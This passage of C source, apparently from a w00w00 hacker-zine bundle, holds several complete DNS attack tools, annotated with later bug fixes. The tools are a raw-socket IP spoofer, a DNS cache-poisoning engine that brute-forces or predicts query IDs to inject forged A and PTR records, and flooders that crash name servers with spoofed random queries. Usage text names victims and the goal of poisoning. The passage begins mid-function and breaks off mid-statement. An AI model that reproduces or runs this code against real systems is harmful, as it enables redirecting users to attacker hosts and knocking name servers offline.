        sum += *w++;
        nleft -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    }

    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
    sum += (sum >> 16);                     /* add carry */
    answer = ~sum;                          /* truncate to 16 bits */
    return (answer);
}

/* Build an IP+UDP datagram with an arbitrary source address and push it out
 * a raw socket opened with IP_HDRINCL. The UDP checksum is left at 0, which
 * IPv4 permits (checksum not computed). */
int udp_send(int s, unsigned long saddr, unsigned long daddr,
             unsigned short sport, unsigned short dport,
             char *datagram, unsigned datasize)
{
    int x;
    unsigned char *data;
    unsigned char packet[4024];
    struct iphdr *ip;
    struct udphdr *udp;
    struct sockaddr_in sin;

    if (IPHDRSIZE + UDPHDRSIZE + datasize > sizeof(packet))
        return (-1);

    ip = (struct iphdr *)packet;
    udp = (struct udphdr *)(packet + IPHDRSIZE);
    data = (unsigned char *)(packet + IPHDRSIZE + UDPHDRSIZE);

    memset(packet, 0, sizeof(packet));

    udp->source = htons(sport);
    udp->dest = htons(dport);
    udp->len = htons(UDPHDRSIZE + datasize);
    udp->check = 0;

    memcpy(data, datagram, datasize);
    memset(packet, 0, IPHDRSIZE);

    ip->saddr.s_addr = saddr;               /* the forged source */
    ip->daddr.s_addr = daddr;
    ip->version = 4;
    ip->ihl = 5;
    ip->ttl = 245;
    ip->id = random() % 5985 + 1;
    ip->protocol = IPPROTO_UDP;
    ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
    ip->check = 0;
    ip->check = in_cksum((u_short *)packet, IPHDRSIZE);

    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = daddr;
    sin.sin_port = udp->dest;

    x = sendto(s, packet, IPHDRSIZE + UDPHDRSIZE + datasize, 0,
               (struct sockaddr *)&sin, sizeof(struct sockaddr));
    return (x);
}

/*****************************************************************************/
/* RECV PAKET                                                                */
/* get_pkt(socket, *buffer, size of the buffer);                             */
/*****************************************************************************/
int get_pkt(int s, unsigned char *data, int size)
{
    struct sockaddr_in sin;
    socklen_t len;
    int resu;

    len = sizeof(sin);
    resu = recvfrom(s, data, size, 0, (struct sockaddr *)&sin, &len);
    return resu;
}

----[END of WSD-spoof.c]----

----[WSD-DNS2.c]----

/* ****************************************************** */
/*        w00w00 code for DNS packets Super Raw           */
/* ------------------------------------------------------ */
/*        w00w00 Security Development (WSD)               */
/*        Email: WSD@w00w00.org                           */
/*        Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ****************************************************** */

#define ERROR       -1
#define TYPE_A      1
#define TYPE_PTR    12
#define MAXLEN      64
#define DNSHDRSIZE  12

/* Unaligned 16/32-bit stores. The original wrote through casts such as
 * *(u_short *)(data+i), which is what bus-errors on SPARC (see BUGS);
 * memcpy is the portable way. Values are passed already in network order. */
static void put16(char *p, u_short v) { memcpy(p, &v, 2); }
static void put32(char *p, uint32_t v) { memcpy(p, &v, 4); }

int myrand(void)
{
    int j = 1 + (int)(150.0 * rand() / (RAND_MAX + 1.0));
    return (j);
}

unsigned long host2ip(char *serv)
{
    struct hostent *hent;
    struct sockaddr_in sinn;

    hent = gethostbyname(serv);
    if (hent == NULL) {
        herror("gethostbyname");
        exit(ERROR);
    }
    bzero((char *)&sinn, sizeof(sinn));
    bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
    return sinn.sin_addr.s_addr;
}

/* "www.heike.com" -> "\3www\5heike\3com" (the terminating 0 of the DNS name
 * is the C string's own NUL). */
void nameformat(char *name, char *qs)
{
    int i;
    int a = 0;
    char lol[3000];
    char tmp[2550], tmp2[2550];

    if (strlen(name) > sizeof(tmp) - 1) {
        fprintf(stderr, "nameformat(): name too long: %s\n", name);
        exit(ERROR);
    }
    bzero(lol, sizeof(lol));
    bzero(tmp, sizeof(tmp));
    bzero(tmp2, sizeof(tmp2));

    for (i = 0; i < strlen(name); i++) {
        if (*(name + i) == '.') {
            sprintf(tmp2, "%c%s", a, tmp);      /* length byte, then the label */
            strcat(lol, tmp2);
            bzero(tmp, sizeof(tmp));
            bzero(tmp2, sizeof(tmp2));
            a = 0;
        } else
            tmp[a++] = *(name + i);
    }
    sprintf(tmp2, "%c%s", a, tmp);
    strcat(lol, tmp2);
    strcpy(qs, lol);
}

/* "31.33.7.44" -> the encoded form of "44.7.33.31.in-addr.arpa" */
void nameformatIP(char *ip, char *resu)
{
    int i, a = 3, k = 0;
    char c;
    char *A[4];
    char nameform[256];
    char tmp[256], tmp1[256];
    char *arpa = "in-addr.arpa";

    if (strlen(ip) > sizeof(nameform) - 1) {
        fprintf(stderr, "nameformatIP(): name too long: %s\n", ip);
        exit(ERROR);
    }
    bzero(tmp, sizeof(tmp));
    bzero(tmp1, sizeof(tmp1));
    bzero(nameform, sizeof(nameform));

    for (i = 0; i < 4; i++) {
        A[i] = (char *)malloc(4);
        if (A[i] == NULL) {
            perror("malloc");
            exit(ERROR);
        }
        bzero(A[i], 4);
    }

    /* split the dotted quad and store the octets in reverse order */
    for (i = 0; i < strlen(ip); i++) {
        c = ip[i];
        if (c == '.') {
            strcat(A[a], tmp);
            a--;
            k = 0;
            bzero(tmp, sizeof(tmp));
        } else
            tmp[k++] = c;
    }
    strcat(A[a], tmp);

    for (i = 0; i < 4; i++) {
        strcat(tmp1, A[i]);
        strcat(tmp1, ".");
    }
    strcat(tmp1, arpa);
    nameformat(tmp1, nameform);
    strcpy(resu, nameform);
    for (i = 0; i < 4; i++)
        free(A[i]);
}

/* Question section: name + QTYPE + QCLASS(IN). Returns its length. */
int makepacketQS(char *data, char *name, int type)
{
    if (type == TYPE_A) {
        nameformat(name, data);
        put16(data + strlen(data) + 1, htons(TYPE_A));
    }
    if (type == TYPE_PTR) {
        nameformatIP(name, data);
        put16(data + strlen(data) + 1, htons(TYPE_PTR));
    }
    put16(data + strlen(data) + 3, htons(1));
    return (strlen(data) + 5);
}

/* Question section followed by one answer RR carrying the spoofed record.
 * Returns the total length. */
int makepacketAW(char *data, char *name, char *ip, int type)
{
    int i;
    char tmp[2550];

    bzero(tmp, sizeof(tmp));

    if (type == TYPE_A) {
        nameformat(name, data);
        put16(data + strlen(data) + 1, htons(1));
        put16(data + strlen(data) + 3, htons(1));
        i = strlen(data) + 5;
        strncpy(data + i, data, MAXLEN);            /* RR owner name = question name */
        i = i + strlen(data) + 1;
        put16(data + i, htons(TYPE_A));
        put16(data + i + 2, htons(1));              /* class IN */
        put32(data + i + 4, htonl(9999999));        /* TTL (original forgot htonl) */
        put16(data + i + 8, htons(4));              /* RDLENGTH */
        put32(data + i + 10, host2ip(ip));          /* RDATA: the spoofed address */
        return (i + 14);
    }
    if (type == TYPE_PTR) {
        nameformat(name, tmp);
        nameformatIP(ip, data);
        put16(data + strlen(data) + 1, htons(TYPE_PTR));
        put16(data + strlen(data) + 3, htons(1));
        i = strlen(data) + 5;
        strncpy(data + i, data, MAXLEN);
        i = i + strlen(data) + 1;
        put16(data + i, htons(TYPE_PTR));
        put16(data + i + 2, htons(1));
        put32(data + i + 4, htonl(9999999));
        put16(data + i + 8, htons(strlen(tmp) + 1));
        strncpy(data + i + 10, tmp, MAXLEN);        /* RDATA: the spoofed name */
        return (i + 10 + strlen(tmp) + 1);
    }
    /* You were only supposed to use type A or PTR! Bad people. */
    return (ERROR);
}

/* Send a recursive question for NAME to d_ip, apparently from s_ip. */
void sendquestion(u_long s_ip, u_long d_ip, char *name, int type)
{
    int i;
    int on = 1;
    int sraw;
    char *data;
    char buff[1024];
    struct dnshdr *dns;

    sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sraw == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
        perror("setsockopt");
        exit(ERROR);
    }

    dns = (struct dnshdr *)buff;
    data = (char *)(buff + DNSHDRSIZE);
    bzero(buff, sizeof(buff));

    dns->id = 6000 + myrand();
    dns->qr = 0;
    dns->rd = 1;
    dns->aa = 0;
    dns->que_num = htons(1);
    dns->rep_num = htons(0);

    i = makepacketQS(data, name, type);
    /* the original wrote "1200+myrand" (pointer arithmetic on the function) */
    udp_send(sraw, s_ip, d_ip, 1200 + myrand(), 53, buff, DNSHDRSIZE + i);
    close(sraw);
}

/* Send one spoofed authoritative answer with the given ID, 53 -> 53 as if
 * it came from the real server s_ip. */
void sendanswer(u_long s_ip, u_long d_ip, char *name, char *spoofip, int ID, int type)
{
    int i;
    int on = 1;
    int sraw;
    char *data;
    char buff[1024];
    struct dnshdr *dns;

    sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sraw == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
        perror("setsockopt");
        exit(ERROR);
    }

    dns = (struct dnshdr *)buff;
    data = (char *)(buff + DNSHDRSIZE);
    bzero(buff, sizeof(buff));

    dns->id = htons(ID);
    dns->qr = 1;
    dns->rd = 1;
    dns->aa = 1;
    dns->que_num = htons(1);
    dns->rep_num = htons(1);

    i = makepacketAW(data, name, spoofip, type);
    udp_send(sraw, s_ip, d_ip, 53, 53, buff, DNSHDRSIZE + i);
    close(sraw);
}

/* Make the victim ask for the name (4 questions from a fake source), then
 * race the real server with 2 x 80 spoofed answers, IDs ID..ID+79. */
void dnsspoof(char *dnstrust, char *victim, char *spoofname, char *spoofip, int ID, int type)
{
    int loop, rere;
    u_long fakeip, trustip, victimip;

    trustip = host2ip(dnstrust);
    victimip = host2ip(victim);
    fakeip = host2ip("12.1.1.0");

    /* send question ... */
    if (type == TYPE_PTR)
        for (loop = 0; loop < 4; loop++)
            sendquestion(fakeip, victimip, spoofip, type);
    if (type == TYPE_A)
        for (loop = 0; loop < 4; loop++)
            sendquestion(fakeip, victimip, spoofname, type);

    /* Answer quickly! */
    for (rere = 0; rere < 2; rere++)
        for (loop = 0; loop < 80; loop++) {
            printf("trustip: %s, victimip: %s, spoofname: %s, spoofip: %s, "
                   "ID: %i, type: %i\n",
                   dnstrust, victim, spoofname, spoofip, ID + loop, type);
            sendanswer(trustip, victimip, spoofname, spoofip, ID + loop, type);
        }
}

----[END of WSD-DNS2.c]----

----[WSD-baddns.c ]----

/* ******************************************************* */
/*        w00w00 DNS attack (Denial of Service)            */
/*        w00w00 Security Development (WSD)                */
/* ------------------------------------------------------- */
/*        Email: WSD@w00w00.org                            */
/*        Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */

#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"

#define VERSION "v0.2"

int main(int argc, char **argv)
{
    int sraw, on = 1;
    unsigned long s_ip, d_ip;
    char *data;
    char buf[4000];
    char names[255];
    struct dnshdr *dns;

    printf("w00w00!\n");
    if (argc < 2) {
        printf("Usage: %s <name server to attack>\n", argv[0]);
        printf("w00w00 DNS Attack - WSD@w00w00.org\n");
        exit(0);
    }

    dns = (struct dnshdr *)buf;
    data = (char *)(buf + DNSHDRSIZE);
    bzero(buf, sizeof(buf));

    sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sraw == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
        perror("setsockopt");
        exit(ERROR);
    }

    printf("WSD-baddns %s: DNS attack - w00w00 Security Development (WSD)\n", VERSION);
    sleep(1);

    s_ip = host2ip("100.1.2.3");
    d_ip = host2ip(argv[1]);

    dns->id = 123;
    dns->rd = 1;
    dns->que_num = htons(1);

    /* Endless stream of PTR queries for random in-addr.arpa names, each from
     * a different forged source, so every one is a cache miss the victim has
     * to go and resolve. */
    while (1) {
        /* %03d keeps every label exactly 3 bytes long, matching the \3 length
         * prefix (the original's %d produced malformed labels below 100). */
        sprintf(names, "\3%03d\3%03d\3%03d\3%03d\07in-addr\04arpa",
                myrand(), myrand(), myrand(), myrand());
        printf("%s\n", names);
        strcpy(data, names);
        put16(data + strlen(names) + 1, htons(TYPE_PTR));
        put16(data + strlen(names) + 3, htons(1));
        udp_send(sraw, s_ip, d_ip, 2600 + myrand(), 53, buf,
                 DNSHDRSIZE + strlen(names) + 5);
        s_ip = ntohl(s_ip);
        s_ip++;
        s_ip = htonl(s_ip);
    }
    return 0;
}

----[END of WSD-baddns.c]----

----[WSDkillDNS.c ]----

/* *********************************************** */
/*      w00w00 DNS Killer (Brutal attack)          */
/* ----------------------------------------------- */
/*      Email: WSD@w00w00.org                      */
/*      WWW: http://www.w00w00.org                 */
/*      FTP: ftp://ftp.w00w00.org/pub              */
/* *********************************************** */

#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"

#define ID_START   1
#define ID_STOP    65535
#define VERSION    "v0.3"
#define PORT_START 53
#define PORT_STOP  54

int main(int argc, char **argv)
{
    struct dnshdr *dns;
    char *data;
    char buffer2[4000];
    char names[255];
    unsigned long s_ip, s_ip2;
    unsigned long d_ip, d_ip2;
    int sraw, i, on = 1, x, loop;
    int idstart, idstop, portstart, portstop;

    printf("w00w00!\n");
    printf("w00w00 Security Development (WSD)\n");
    printf("WSD@w00w00.org\n");

    if (argc < 5) {
        system("/usr/bin/clear");
        printf("w00w00!\n");
        printf("w00w00 Security Development (WSD)\n");
        printf("WSD@w00w00.org\n\n");
        printf(" Usage : %s <ip src> <ip dst> <name> <ip>\n"
               "\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP]\n", argv[0]);
        printf(" ip src: ip source of the dns answer\n");
        printf(" ip dst: ip of the dns victim\n");
        printf(" name  : spoof name i.e.: www.dede.com\n");
        printf(" ip    : the ip associated with the name\n");
        printf(" options:\n");
        printf("   [A,B,N]...\n");
        printf("   A: flood the DNS victim with multiple queries\n");
        printf("   B: DoS attack to crash the DNS\n");
        printf("   N: No attacks\n\n");
        printf("   [ID_START]\n");
        printf("   ID_START: id start :>\n\n");
        printf("   [ID_STOP]\n");
        printf("   ID_STOP : id stop :>\n\n");
        printf("   PORT START, PORT STOP: send the spoof to every port from portstart to portstop\n\n");
        exit(ERROR);
    }

    dns = (struct dnshdr *)buffer2;
    data = (char *)(buffer2 + DNSHDRSIZE);
    bzero(buffer2, sizeof(buffer2));

    sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sraw == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
        perror("setsockopt");
        exit(ERROR);
    }

    printf("WSDkillDNS %s \n", VERSION);

    s_ip2 = s_ip = host2ip(argv[1]);
    d_ip2 = d_ip = host2ip(argv[2]);

    /* option A: 10 queries for the name from 10 forged sources, so the victim
     * has outstanding requests for it while we flood answers */
    if (argc > 5 && *argv[5] == 'A')
        for (loop = 0; loop < 10; loop++) {
            dns->id = 6000 + loop;
            dns->qr = 0;
            dns->rd = 1;
            dns->aa = 0;
            dns->que_num = htons(1);
            dns->rep_num = htons(0);
            i = makepacketQS(data, argv[3], TYPE_A);
            udp_send(sraw, s_ip, d_ip, 1200 + loop, 53, buffer2, DNSHDRSIZE + i);
            s_ip = ntohl(s_ip);
            s_ip++;
            s_ip = htonl(s_ip);
        }

    /* option B: the same flood as WSD-baddns, for a chosen number of packets */
    if (argc > 5 && *argv[5] == 'B') {
        s_ip = host2ip("100.1.2.3");
        dns->id = 123;
        dns->rd = 1;
        dns->que_num = htons(1);
        printf("Enter the number of packets to send: ");
        scanf("%d", &i);
        for (x = 0; x < i; x++) {
            sprintf(names, "\3%03d\3%03d\3%03d\3%03d\07in-addr\04arpa",
                    myrand(), myrand(), myrand(), myrand());
            strcpy(data, names);
            put16(data + strlen(names) + 1, htons(TYPE_PTR));
            put16(data + strlen(names) + 3, htons(1));
            udp_send(sraw, s_ip, d_ip, 2600 + myrand(), 53, buffer2,
                     DNSHDRSIZE + strlen(names) + 5);
            s_ip = ntohl(s_ip);
            s_ip++;
            s_ip = htonl(s_ip);
            printf("send packet # %i:%i\n", x, i);
        }
    }

    idstart = (argc > 6) ? atoi(argv[6]) : ID_START;
    idstop = (argc > 7) ? atoi(argv[7]) : ID_STOP;
    if (argc > 9) {                         /* original tested argc > 8 and read argv[9] */
        portstart = atoi(argv[8]);
        portstop = atoi(argv[9]);
    } else {
        portstart = PORT_START;
        portstop = PORT_STOP;
    }

    bzero(buffer2, sizeof(buffer2));
    bzero(names, sizeof(names));
    s_ip = s_ip2;
    d_ip = d_ip2;

    /* brute force: one spoofed answer per ID in [idstart, idstop), to every
     * destination port in [portstart, portstop) */
    for (; idstart < idstop; idstart++) {
        dns->id = htons(idstart);
        dns->qr = 1;
        dns->rd = 1;
        dns->aa = 1;
        dns->que_num = htons(1);
        dns->rep_num = htons(1);
        printf("send answer with id %i to ports %i..%i\n", idstart, portstart, portstop - 1);
        i = makepacketAW(data, argv[3], argv[4], TYPE_A);
        /* the original left x at 0 for the first ID and so hit ports 0..portstop-1 */
        for (x = portstart; x < portstop; x++)
            udp_send(sraw, s_ip, d_ip, 53, x, buffer2, DNSHDRSIZE + i);
    }
    printf(" terminated..\n");
    return 0;
}

----[END of WSDkillDNS.c ]----

----[WSD-IDpred.c ]----

/* ******************************************************* */
/*        w00w00 DNS ID Predictor Super Raw                */
/* ------------------------------------------------------- */
/*        Email: WSD@w00w00.org                            */
/*        Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */

#include <fcntl.h>      /* restored (lost in the zine copy): O_NONBLOCK */
#include <time.h>
#include "dns.h"
#include "WSD-spoof.c"
#include "WSD-DNS2.c"

#define TIMEOUT   300
#define VERSION   "v0.7"
#define SPOOFIP   "4.4.4.4"
#define UNDASPOOF "111.111.111.111"
#define LEN       sizeof(struct sockaddr)

void usage(void)
{
    printf("w00w00 DNS ID Predictor\n");
    printf("w00w00 Security Development (WSD)\n");
    printf("WSD@w00w00.org\n");
    printf(" WSD-idpred <your host> <ns of domain> <domain> <victim ns> <type> <spoof name> <spoof ip> <trusted ns> [ID]\n");
    printf("\n Ex: WSD-idpred ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID]\n");
    printf(" We are going to poison ns.victim.com so they resolve mouhhahaha.hol.fr in 31.3.3.7\n");
    printf(" We use provnet.fr and ns1.provnet for finding the ID of ns.victim.com\n");
    printf(" We use ns.isdnet.net for spoofing because they have AUTH on *.hol.fr\n");
    printf(" For more information check ftp.w00w00.org/pub/DNS/\n");
    printf(" Mail WSD@w00w00.org.\n");
    exit(ERROR);
}

/* Send a DNS packet from a normal (non-spoofed) UDP socket: a question when
 * dns->qr == 0, otherwise an answer. */
void senddnspkt(int s, u_long d_ip, char *wwwname, char *ip, struct dnshdr *dns)
{
    int i;
    char buffer[1024];
    char *data = (char *)(buffer + DNSHDRSIZE);
    struct sockaddr_in sin;

    bzero(buffer, sizeof(buffer));
    memcpy(buffer, dns, DNSHDRSIZE);

    if (dns->qr == 0)
        i = makepacketQS(data, wwwname, TYPE_A);
    else
        i = makepacketAW(data, wwwname, ip, TYPE_A);

    sin.sin_family = AF_INET;
    sin.sin_port = htons(53);
    sin.sin_addr.s_addr = d_ip;
    sendto(s, buffer, DNSHDRSIZE + i, 0, (struct sockaddr *)&sin, LEN);
}

/* Non-recursive question: the victim may only answer from its cache, so an
 * answer with a record in it proves one of our spoofed answers got in. */
void dns_qs_no_rd(int s, u_long d_ip, char *wwwname, int ID)
{
    char buffer[1024];
    struct dnshdr *dns;

    dns = (struct dnshdr *)buffer;
    bzero(buffer, sizeof(buffer));
    dns->id = htons(ID);
    dns->qr = 0;
    dns->rd = 0;                            /* dont want the recursion !! */
    dns->aa = 0;
    dns->que_num = htons(1);
    dns->rep_num = htons(0);
    senddnspkt(s, d_ip, wwwname, NULL, dns);
}

int main(int argc, char **argv)
{
    struct sockaddr_in sin_rcp;
    struct in_addr ina;
    struct dnshdr *dns, *dns_recv;
    socklen_t len = sizeof(struct sockaddr);
    int sraw, s_r, i, on = 1, ID, times;
    char host[256];
    char dnstrust[256];
    char *data;
    char buf[4000], buf1[4000];
    char spoofname[256], spoofip[256];
    char fakename[256];
    unsigned long s_ip, s_ip2;
    unsigned long d_ip, d_ip2, trust;
    unsigned int loop = 65535;

    dns_recv = (struct dnshdr *)buf1;
    dns = (struct dnshdr *)buf;
    data = (char *)(buf + DNSHDRSIZE);
    bzero(buf, sizeof(buf));

    srand(time(NULL));

    printf("w00w00 DNS ID Predictor\n");
    printf("w00w00 Security Development (WSD)\n");
    printf("WSD@w00w00.org\n");

    /* ordinary UDP socket, non-blocking, for the probe questions */
    s_r = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (s_r == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((fcntl(s_r, F_SETFL, O_NONBLOCK)) == ERROR) {
        perror("fcntl");
        exit(ERROR);
    }

    /* raw socket for the spoofed answers */
    sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sraw == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)) {
        perror("setsockopt");
        exit(ERROR);
    }

    if (argc < 6)                           /* argv[1..5] are used unconditionally */
        usage();
    if (argc > 9)
        loop = atoi(argv[9]);

    if (argc > 6) {
        if (strlen(argv[6]) > sizeof(spoofname) - 1) {
            fprintf(stderr, "argv[6] too long: %s\n", argv[6]);
            exit(ERROR);
        } else
            strcpy(spoofname, argv[6]);
    } else {
        printf("Enter the name you want spoof: ");
        scanf("%255s", spoofname);
    }

    if (argc > 7) {
        strncpy(host, argv[7], sizeof(host) - 1);
        host[sizeof(host) - 1] = '\0';
    } else {
        printf("Enter the IP address of the spoof name: ");
        scanf("%255s", host);
    }
    ina.s_addr = host2ip(host);             /* original passed a u_long to inet_ntoa() */
    strcpy(spoofip, inet_ntoa(ina));

    if (argc > 8) {
        if (strlen(argv[8]) > sizeof(host) - 1) {
            fprintf(stderr, "argv[8] too long: %s\n", argv[8]);
            exit(ERROR);
        } else
            strcpy(host, argv[8]);
    } else {
        printf("Enter the trusted NS of the victim: ");
        scanf("%255s", host);
    }
    ina.s_addr = host2ip(host);
    strcpy(dnstrust, inet_ntoa(ina));

    printf("WSD-IDpred %s w00w00 (WSD) - Super Raw\n", VERSION);

    /* save some arguments */
    s_ip2 = host2ip(argv[1]);
    trust = host2ip(argv[2]);               /* the NS of the domain we query: spoofed source */
    s_ip = host2ip(UNDASPOOF);
    d_ip2 = d_ip = host2ip(argv[4]);        /* the victim */
    (void)s_ip2;

    if (strlen(argv[3]) > sizeof(fakename) - 1 - 20) {
        fprintf(stderr, "argv[3] too long: %s\n", argv[3]);
        exit(ERROR);
    }

    while (1) {
        /* 1. a fresh random name under the domain: the victim has nothing
         *    cached for it and must send a query to the domain's NS */
        sprintf(fakename, "%d%d%d%d%d%d.%s", myrand(), myrand(), myrand(),
                myrand(), myrand(), myrand(), argv[3]);
        sendquestion(s_ip, d_ip, fakename, TYPE_A);

        /* 2. race that query with 11 spoofed answers, IDs ID-10..ID, from "trust" */
        bzero(buf, sizeof(buf));
        ID = loop;
        for (; loop >= ID - 10; loop--) {
            dns->id = htons(loop);
            dns->qr = 1;
            dns->rd = 1;
            dns->aa = 1;
            dns->que_num = htons(1);
            dns->rep_num = htons(1);
            i = makepacketAW(data, fakename, SPOOFIP, TYPE_A);
            udp_send(sraw, trust, d_ip2, 53, 53, buf, DNSHDRSIZE + i);
        }
        bzero(buf, sizeof(buf));

        /* 3. probe the victim's cache with a non-recursive question */
        dns_qs_no_rd(s_r, d_ip2, fakename, myrand());

        /* We are waiting for answer ... */
        while (1) {
            for (times = 0; times < TIMEOUT; times++) {
                if (recvfrom(s_r, buf1, sizeof(buf1), 0,
                             (struct sockaddr *)&sin_rcp, &len) != ERROR) {
                    printf("We have the response.\n");
                    break;
                }
                usleep(10);
            }
            if (times == TIMEOUT) {
                printf("We have no response from the NS. Resend question..\n");
                dns_qs_no_rd(s_r, d_ip2, fakename, myrand());
            } else
                break;
        }

        /* Okay we have an answer */
        printf("fakename = %s\n", fakename);
        if (sin_rcp.sin_addr.s_addr == d_ip2 && sin_rcp.sin_port == htons(53)
            && dns_recv->qr == 1) {
            if (dns_recv->rep_num == 0) {
                /* We dont have the right ID (the real answer was NXDOMAIN) */
                printf("Try %d < ID < %d\n", ID - 10, ID);
            } else {
                /* The spoof has worked, we have found the right ID! */
                printf("the DNS ID of %s is between %d and %d!!\n", argv[4], ID - 10, ID);
                printf("Let's send the spoof...\n");
                dnsspoof(dnstrust, argv[4], spoofname, spoofip, loop, atoi(argv[5]));
                printf("spoof sent...\n");
                exit(0);
            }
        }
        bzero(buf1, sizeof(buf1));
    }
    return 0;
}

----[END of WSD-IDpred.c]----

----[ WSDspoofID.c ]----

/* ******************************************************* */
/*        w00w00 DNS ID Spoofer Super Raw                  */
/*        w00w00 Security Development (WSD)                */
/* ------------------------------------------------------- */
/*        Email: WSD@w00w00.org                            */
/*        Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */

#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"
#include <pcap.h>       /* restored (lost in the zine copy): pcap_open_live() */
#include <time.h>

#define VERSION "v0.6"
#define SPOOF   "127.0.0.1"

int ETHHDRSIZE;

int main(int argc, char **argv)
{
    int sraw, i, on = 1, con, ID, DA_ID, type;
    struct iphdr *ip;
    struct udphdr *udp;
    struct dnshdr *dnsrecv, *dnssend;
    struct in_addr ina;
    pcap_t *pcap_d;
    struct pcap_pkthdr h;
    char *buf;
    char host[256];
    char ebuf[PCAP_ERRBUF_SIZE];
    char buf1[1024];
    char namefake[256];
    char dnstrust[256];
    char *data, *data2;
    char spoofip[256], spoofname[256];
    unsigned long d_ip;
    unsigned long s_ipns;

    srand((time(NULL) % random() * random()));

    printf("w00w00 DNS ID Spoofer - Super Raw!\n");
    printf("w00w00 Security Development (WSD)\n");
    printf("WSD@w00w00.org\n");

    if (argc < 6) {                         /* argv[1..5] are used unconditionally */
        printf("Usage: %s <interface> <victim ns> <your domain> <your ns> <type> <spoof name> <spoof ip> <trusted ns>\n", argv[0]);
        printf("Example: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr\n", argv[0]);
        printf(" So... we try to poison victim.com with type 12 (PTR). Now, if someone asked for the ip of mail.provnet.fr they will resolve to damn.diz.ip.iz.ereet.ya\n");
        exit(1);
    }

    /* link-layer header length in the capture: none on PPP, 14 on Ethernet */
    if (strstr(argv[1], "ppp0"))
        ETHHDRSIZE = 0;
    else
        ETHHDRSIZE = 14;

    type = atoi(argv[5]);

    if (argc > 6) {
        if (strlen(argv[6]) > sizeof(spoofname) - 1) {
            fprintf(stderr, "argv[6] too long: %s\n", argv[6]);
            exit(ERROR);
        } else
            strcpy(spoofname, argv[6]);
    } else {
        printf("Enter the name you want to spoof: ");
        scanf("%255s", spoofname);
    }

    if (argc > 7) {
        if (strlen(argv[7]) > sizeof(host) - 1) {
            fprintf(stderr, "argv[7] too long: %s\n", argv[7]);
            exit(ERROR);
        } else
            strcpy(host, argv[7]);
    } else {
        printf("Enter the IP of the name to spoof: ");
        scanf("%255s", host);
    }
    ina.s_addr = host2ip(host);
    strcpy(spoofip, inet_ntoa(ina));

    if (argc > 8) {
        strncpy(host, argv[8], sizeof(host) - 1);
        host[sizeof(host) - 1] = '\0';
    } else {
        printf("Enter the trusted dns for the spoof: ");
        scanf("%255s", host);
    }
    ina.s_addr = host2ip(host);
    strcpy(dnstrust, inet_ntoa(ina));

    dnssend = (struct dnshdr *)buf1;
    data2 = (char *)(buf1 + DNSHDRSIZE);
    bzero(buf1, sizeof(buf1));

    sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sraw == ERROR) {
        perror("socket");
        exit(ERROR);
    }
    if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) {
        perror("setsockopt");
        exit(ERROR);
    }

    printf("WSDspoofID.c %s w00w00 ID sniffer\n", VERSION);
    printf("w00w00 Security Development\n");
    sleep(1);

    pcap_d = pcap_open_live(argv[1], 1024, 0, 100, ebuf);
    if (pcap_d == NULL) {
        fprintf(stderr, "pcap_open_live: %s\n", ebuf);
        exit(ERROR);
    }

    s_ipns = host2ip(argv[4]);              /* our NS, the one we sniff */
    d_ip = host2ip(argv[2]);                /* the victim */
    con = myrand();

    /* Make the question to get the ID: a query for a random name in our own
     * domain, so the victim has to come and ask our NS, where we sniff the ID */
    sprintf(namefake, "%d%d%d.%s", myrand(), myrand(), myrand(), argv[3]);
    dnssend->id = 2600;
    dnssend->qr = 0;
    dnssend->rd = 1;
    dnssend->aa = 0;
    dnssend->que_num = htons(1);
    dnssend->rep_num = htons(0);
    i = makepacketQS(data2, namefake, TYPE_A);
    udp_send(sraw, s_ipns, d_ip, 2600 + con, 53, buf1, DNSHDRSIZE + i);
    printf("Question sent...please wait\n");

    while (1) {
        buf
